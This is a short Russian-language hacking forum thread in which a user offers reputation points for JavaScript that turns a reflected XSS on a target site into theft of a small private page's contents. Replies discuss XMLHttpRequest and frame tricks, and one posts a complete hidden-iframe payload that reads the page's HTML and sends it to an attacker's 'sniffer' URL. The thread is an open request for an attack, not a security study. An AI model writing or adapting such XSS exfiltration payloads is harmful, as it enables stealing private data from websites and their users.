|
(+50) Вопрос по Javascript
Gh0s7 попропрорпросил запостить :)
Собственно сабж. Есть вопрос по жс. <Gh0s7> Ситуация такая: <Gh0s7> Есть саент, на нем пассив гет хсс, длина неорграничена. <Gh0s7> На том же саенте есть мааленькая страничка. Она очень маленькая, в одну строку, примерно 12-16 символов, полностью без хтмл. <Gh0s7> Нужно через имеющуюся хсс слить эту страницу куда-нибудь, например на сниффер. <Gh0s7> На сколько я знаю, это реально. <Gh0s7> Тем, кто даст код +50 в репу (после того, как вернусь из отпуска, в понедельник) |
через xss получить контент страницы? 0_о страница закрытая что ли? Типа для мемберов?
Думаю через XMLHttpRequest как-нить поколодовать можно. Отправить запрос на страницу, получить контент в качестве ответа, передать контент снифферу. Хотя хз. Вариант 2: Вставляем в уязвимую страницу фрейм с таргетом на закрытую страницу, и JS код который тырит контент фрейма (помоему innerHTML может из фрейма контент забрать?). ну и далее этот контент отправляем на снифак. ЗЫ просто мысли в слух - надеюсь никто не против. |
Код:
<script src=""></script> |
+toxa+=)
опередил |
А так не меньше?
Код HTML:
<frame src=""> |
в случае фрейма должны быть одинаковые домены(тут тоже есть тонкость) фрейма и закрытой страницы
или нужно писать <frame src='javascript:......'> (не уверен что прокатит) ******** если я правильно понял про что вы , если нет-извините=) |
Код HTML:
<iframe id="i1" name="i1" style="display:none" src="http://that/we/wish/to.steal" onload="i1.onload='';i1.contentDocument.location='http://our/sniffer.script?data='+escape(i1.contentDocument.getElementsByTagName('html')[0].innerHTML)"></iframe> |
GreenBear, все таки
Цитата:
Цитата:
|
Цитата:
|
омг, ты в курсе что событие onload в iframe происходит после того, как полностью загрузилась страница, указанная в его src?
|
| Время: 15:43 |